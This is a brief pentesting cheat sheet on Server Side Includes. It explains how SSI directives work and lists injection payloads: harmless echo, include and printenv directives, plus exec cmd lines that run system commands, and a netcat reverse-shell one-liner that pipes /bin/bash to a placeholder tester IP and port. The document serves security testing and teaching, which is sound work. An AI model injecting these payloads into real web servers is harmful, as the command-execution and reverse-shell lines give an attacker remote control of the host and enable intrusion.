Server Side Includes

SSI (Server Side Includes) are directives that are placed in HTML pages, and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology. For example, you might place a directive into an existing HTML page, such as:

<!--#echo var="DATE_LOCAL" -->

And, when the page is served, this fragment will be evaluated and replaced with its value:

Tuesday, 15-Jan-2013 19:28:54 EST

You can infer the presence of SSI if the web application uses files with the extensions ** .shtml, .shtm or .stm**, but it's not only the case.

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

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